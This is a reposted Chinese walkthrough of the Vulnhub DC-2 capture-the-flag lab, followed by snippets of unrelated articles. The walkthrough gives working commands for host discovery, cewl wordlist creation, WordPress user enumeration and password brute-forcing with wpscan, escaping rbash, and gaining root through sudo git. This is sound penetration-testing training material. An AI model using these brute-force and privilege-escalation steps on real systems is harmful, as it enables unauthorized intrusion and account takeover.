Vulnhub-DC-2 靶机复现完整过程

news2024/12/26 11:17:26

环境准备:
kali: NAT模式 网段 :192.168.200.0
DC-2: NAT模式 网段 :192.168.200.0
保证靶机和攻击机在一个网段上

信息收集
收集同网段存货主机IP地址

nmap -sP  ip地址  

image.png

arp-scan -l

image.png
显示错误页面,显然是重定向错误,在本地HOST文件中添加这样的关系
image.png
本地中
image.png
kali中host地址

vim /etc/hosts

以上都可以
image.png
之后就重定向正常页面啦
第一flag提示
image.png
cewl 介绍

cewl是一个ruby应用,爬行指定url的指定深度。
也可以跟一个外部链接,结果会返回一个单词列表,
这个列表可以扔到John the ripper工具里进行密码破解。
-w   将输出结果写入到文件中
-d  爬行深度,默认为2
-m 最小长度,默认为3
cewl http://dc-2 -w passwd.txt #扒取网站字典,将结果输入到passwd.txt中

image.png
用 cewl http://192.168.28.179 -w passwd.txt ,但是没有输出,应该是IP地址给重定向了,用域名进行扒取

cat passwd.txt #查看字典内容

image.png
有密码字典 还需要找账号和登陆后台。
用dirb命令来挖目录
:::success
扩展:获取网站目录目录的工具有:dirb(kali自带)、御剑、dirsearch。
:::

dirb http://dc-2 

image.png
image.png
登陆页面,通过插件可以知道,这是WordPress的CMS ,漏扫工具是wpscan
image.png

目前已经获取了网站的后台网址和密码,现在还差用户名,那么

wpscan --url http://dc-2/ -e u #枚举用户名

:::success
参数:wpcan 参数
-u 枚举用户名
-P 加指定文件 ,代表密码文件
-U 加指定文件,代表账户文件
:::
最终可以查到三个用户名
image.png
将枚举出的用户名保存到文件中
image.png

wpscan --url http://dc-2/ -U user.txt -P passwd.txt #爆破WordPress的账号和密码

image.png
结果,爆破出jerry和tom的密码
image.png
利用其一的账户和密码进行登录
image.png
登陆成功,这便是后台页面
image.png

flag1

image.png

flag2

image.png

If you can't exploit WordPress and take a shortcut, there is another way.
# 如果你不能用 WordPress 走捷径的话,这里还有另一条路

Hope you found another entry point.
# 希望你能找到另一个切入点

前面的端口号还有一个7744的端口使用
使用jerry测试三组全部失败
image.png
接着尝试,Tom账户是可以登录的
image.png

image.png

compgen -c       //查看可以使用的指令

发现有一个VI 指令是可以使用的
image.png
文件显示内容,发现FLAG3.txt,并成功使用和打开
image.png

flag3.txt

poor old Tom is always running after Jerry.
# 可怜的老汤姆总是在追杰瑞
Perhaps he should su for all the stress he causes.
# 也许他应该为自己造成的压力负责

英文当中,有两个账户tom,jerry, su这应该算是提示提权

vi 提权

vi flag3.txt
:set shell=/bin/sh  #shell需要时系统中原本就有的变量,不能自己捏造变量。
:shell

image.png
发现在jerry下的flag.txt 用vi查看
image.png

flag4.txt

image.png

Good to see that you've made it this far - but you're not home yet.
# 很高兴看到你走了这么远-但你还没回家。
You still need to get the final flag (the only flag that really counts!!!)
# 你仍然需要得到最终的标志(唯一真正重要的标志!!!) 
No hints here - you're on your own now. 
# 这里没有提示-你现在只能靠自己了。
Go on - git outta here!!!! 
# 去吧,离这里远点 #用 git 提权

英文提示:用git提权,最终还需要拿到root权限
前面FLAG3有提示su,切到root目录查看
image.png
进入root目录
image.png
不让切换,做了限制 su jerry 是不可以的
**什么是rbash?**它与一般shell的区别在于会限制一些行为,让一些命令无法执行

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量
提权成功

仍然权限不够
image.png
用sudo -l 查看可以运用的权限
git 是root的权限,可以提权
image.png

sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell


git提权的两种方式
1、sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
2、sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

final-flag.txt

image.png
image.png

:::tips
总结:

1.重定向 #在文件中加入域名和IP地址的关系映射
进入网页时出现错误情况,不会自动跳转到DC-2去,在本地DNS下绑定

2.cewl使用 #爬取URL地址和深度
flag的提示,使用cewl的命令,打印出密码破解的字典

3.wpscan使用 #扫描wordpress这个CMS的工具
暴力破解账户之前需要提供密码文件和账户文件

4.rbash提权
5.git提权

参考:https://www.cnblogs.com/starci/p/16484363.html

:::

文章参考:https://blog.csdn.net/a310034188/article/details/121624538
提权手段:https://www.cnblogs.com/zaqzzz/p/12075132.html#2rbash%E7%BB%95%E8%BF%87

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1306207.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

独立完成软件的功能的测试(2)

独立完成软件的功能的测试(2) (12.13) 1. 对穷举场景设计测试点(等价类划分法) 等价类划分法的概念: 说明:数据有共同特征,成功失败分类: 有效&#xff1a…

CSS的三大特性(层叠性、继承性、优先级---------很重要)

CSS 有三个非常重要的三个特性:层叠性、继承性、优先级。 层叠性 场景:相同选择器给设置相同的样式,此时一个样式就会覆盖(层叠)另一个冲突的样式。层叠性主要解决样式冲突 的问题 原则:  样式冲突&am…

如何从eureka-server上进行服务发现,负载均衡远程调用服务

在spring cloud的maven的pom文件中添加eureka-client的依赖坐标 <!--eureka-client依赖--><dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-starter-netflix-eureka-client</artifactId></dependen…

Linux(20):软件安装:原始码与 Tarball

开放源码的软件安装与升级 在Windows系统上面的软件都是一模一样的&#xff0c;【无法修改该软件的源代码】&#xff0c;因此&#xff0c;万一想要增加或者减少该软件的某些功能时&#xff0c;无能为力。。。 Linux 上面的软件几乎都是经过 GPL 的授权&#xff0c;所以每个软件…

99基于matlab的小波分解和小波能量熵函数

基于matlab的小波分解和小波能量熵函数&#xff0c;通过GUI界面导入西储大学轴承故障数据&#xff0c;以可视化的图对结果进行展现。数据可更换自己的&#xff0c;程序已调通&#xff0c;可直接运行。 99小波分解和小波能量熵函数 (xiaohongshu.com)https://www.xiaohongshu.co…

提升数据可视化:拖拽编辑自动汇总,树形数据表格展示新方式

本文由葡萄城技术团队发布。转载请注明出处&#xff1a;葡萄城官网&#xff0c;葡萄城为开发者提供专业的开发工具、解决方案和服务&#xff0c;赋能开发者。 前言 树形结构是一种非常常见的数据结构&#xff0c;它由一组以层次关系排列的节点组成。树的结构类似于自然界中的一…

如何使用内网穿透实现iStoreOS软路由R4S公网远程访问局域网电脑桌面

最近&#xff0c;我发现了一个超级强大的人工智能学习网站。它以通俗易懂的方式呈现复杂的概念&#xff0c;而且内容风趣幽默。我觉得它对大家可能会有所帮助&#xff0c;所以我在此分享。点击这里跳转到网站。 文章目录 简介一、配置远程桌面公网地址二、家中使用永久固定地址…

【数据库】基于有效性确认的并发访问控制原理及调度流程,乐观无锁模式,冲突较少下的最优模型

使用有效性确认的并发控制 ​专栏内容&#xff1a; 手写数据库toadb 本专栏主要介绍如何从零开发&#xff0c;开发的步骤&#xff0c;以及开发过程中的涉及的原理&#xff0c;遇到的问题等&#xff0c;让大家能跟上并且可以一起开发&#xff0c;让每个需要的人成为参与者。 本专…

orb-slam2学习总结

目录 视觉SLAM 1、地图初始化 2、ORB_SLAM地图初始化流程 3、ORB特征提取及匹配 1、对极几何 2、对极约束 &#xff08;epipolar constraint&#xff09; 3、基础矩阵F、本质矩阵E 5、单目尺度不确定性 6、单应矩阵&#xff08;Homography Matrix&#xff09; 6.1 什么是单应矩…

没有明确的报错信息,阿里云国际版Windows服务器无法远程连接

在远程连接失败时&#xff0c;如果您没有收到系统返回的报错信息&#xff0c;并且ECS实例是运行中的状态&#xff0c;然后再根据以下步骤进行排查&#xff1a; 步骤一&#xff1a;使用阿里云Workbench工具测试远程登录 步骤二&#xff1a;检查是否有收到黑洞通知 步骤三&…

Zygote 进程启动过程

首语 在Android系统中&#xff0c;DVM(Dalvik虚拟机)和ART、应用程序进程以及运行系统的关键服务的SystemServer进程都是由Zygote进程创建的&#xff0c;也可以将其称之为孵化器&#xff0c;它通过fork(复制进程)的形式来创建应用程序进程和SystemServer进程。 Zygote进程是在…

AnythingLLM:基于RAG方案构专属私有知识库(开源|高效|可定制)

一、前言 继OpenAI和Google的产品发布会之后&#xff0c;大模型的能力进化速度之快令人惊叹&#xff0c;然而&#xff0c;对于很多个人和企业而言&#xff0c;为了数据安全不得不考虑私有化部署方案&#xff0c;从GPT-4发布以来&#xff0c;国内外的大模型就拉开了很明显的差距…

Oracle(2-17) RMAN Maintenance

文章目录 一、基础知识1、Retention Policy 保留政策2、Recovery Window - Part 1 恢复窗口-第1部分3、Cross Checking 交叉检查4、The CROSSCHECK Command CROSSCHECK命令5、OBSOLETE VS EXPIRED 过时与过期6、Deleting Backups and Copies 删除备份和副本7、The DELETE Comma…

极狐GitLab CI/CD 变量黑魔法之自定义变量

极狐GitLab CI/CD 变量是指一系列的环境变量&#xff0c;用来帮助我们控制 CI/CD Job 或 Pipeline 的行为&#xff0c;存储一些可以复用的信息&#xff0c;避免在 .gitlab-ci.yml 中形成硬编码。 极狐GitLab CI/CD 变量分为预定义变量(predefined CI/CD variables) 和 自定义变…

图论-并查集

并查集(Union-find Sets)是一种非常精巧而实用的数据结构,它主要用于处理一些不相交集合的合并问题.一些常见的用途有求连通子图,求最小生成树Kruskal算法和最近公共祖先(LCA)等. 并查集的基本操作主要有: .1.初始化 2.查询find 3.合并union 一般我们都会采用路径压缩 这样…

flex布局,换行的元素上下设置间距

要生成的效果图如下&#xff1a; display:flexflex-direction: row;flex-wrap: wrap;当我们使用弹性盒子布局后&#xff0c;默认元素是没有外边距的&#xff0c;紧挨着样式就有点丑&#xff0c;如果想使换行后&#xff0c;元素的外边距有个距离&#xff0c;可以用如下方法解决…

Apache Flink(十二):Flink集群部署-Flink On Yarn

🏡 个人主页:IT贫道_大数据OLAP体系技术栈,Apache Doris,Clickhouse 技术-CSDN博客 🚩 私聊博主:加入大数据技术讨论群聊,获取更多大数据资料。 🔔 博主个人B栈地址:豹哥教你大数据的个人空间-豹哥教你大数据个人主页-哔哩哔哩视频 目录

Python学习笔记(四):函数的定义、函数的返回值、None类型、函数说明文档、函数的嵌套调用、局部变量、全局变量、global关键字

目录 一、函数介绍 1. 函数是&#xff1a; 2. 使用函数的好处是&#xff1a; 二、函数的定义&#xff1a; 三、函数的参数 1.传入参数的功能是&#xff1a; 2.函数的传入参数 - 传参定义 3.注意事项&#xff1a; 4.练习&#xff1a;测量体温 四、函数的返回值 1.函数…

Axure元件基本介绍进阶

Axure元件基本介绍进阶 1.Axure元件基本介绍1.在 Axure 中&#xff0c;元件是构建原型的基本构成单元&#xff0c;能够帮助设计师快速创建、重复使用和管理设计元素。以下是 Axure 中元件的基本介绍&#xff1a;1.基本元件&#xff1a; 2.基本元件的使用一.【举例说明】积木&am…

基于 Game Object Conversion 和 SubScene 的 DOTS 开发工作流(干货满满!)

(译前言: Unity DOTS提出了一套全新的开发技术栈, 但目前少有精讲如何结合现有工作流进行开发的资料, 外网 这篇文章 (Game Object Conversion and SubScene) 详细解构了基于 GameObject 和 Subscene 的工作流程和原理, 要求读者对 DOTS/ECS 有基本的了解, 虽然非常之长, 但值得…